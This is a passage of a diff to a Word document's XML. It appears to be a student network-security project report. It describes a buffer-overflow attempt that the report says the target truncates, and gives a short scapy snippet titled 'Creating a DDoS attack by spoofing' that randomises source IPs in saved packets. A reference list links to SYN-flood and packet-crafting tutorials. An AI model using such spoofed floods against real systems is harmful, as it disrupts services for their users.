+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In client, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>client.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">we establish a connection and send more data than buffer can handle, (later we can do it by malforming the packet using </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>creater.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> But the read function smartly truncates the remaining part and prevents an overflow.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Creating a DDoS attack by spoofing:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:i/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>creater.py</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>for i in range(100):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>for pkt in pkts:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>pkt[IP].src= "192.168.0.{}".format(random.randint(2, 100))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>wrpcap('try.pcap', pkt, append = True)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Here pkts is an existing pcap file (see </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>creater.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>). We can then send this to a source using scapy.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4570,7 +6720,6 @@
       <w:r>
         <w:t xml:space="preserve">Dr. </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="24"/>
@@ -4583,7 +6732,6 @@
         </w:rPr>
         <w:t>lka</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="24"/>
@@ -4602,19 +6750,11 @@
         </w:rPr>
         <w:t xml:space="preserve"> and Prof. </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Amulya</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> G</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Amulya G</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4642,11 +6782,376 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="HTMLPreformatted"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
+          <w:numId w:val="25"/>
         </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">acket-crafting:  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId16" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>http://opensourceforu.com/2012/05/cyber-attacks-explained-packet-crafting</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Download Scapy:   </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId17" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>http://www.secdev.org/projects/scapy/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>capy tutorials:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=dyP_CEeIQ-A</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=KzeD3GCZGdI</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DOS attack:    </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>http://opensourceforu.com/2011/10/syn-flooding-using-scapy-and-prevention-using-iptables/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DPKT: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>https://pypi.python.org/pypi/dpkt</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Documentation: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>https://dpkt.readthedocs.io/en/latest/examples.html</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId23" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>https://dpkt.readthedocs.io/en/latest/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Parsing: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId24" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>https://jon.oberheide.org/blog/2008/10/15/dpkt-tutorial-2-parsing-a-pcap-file/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">TCP details: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="22"/>
+          </w:rPr>
+          <w:t>http://www.commercialventvac.com/dpkt.html#mozTocId761132</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
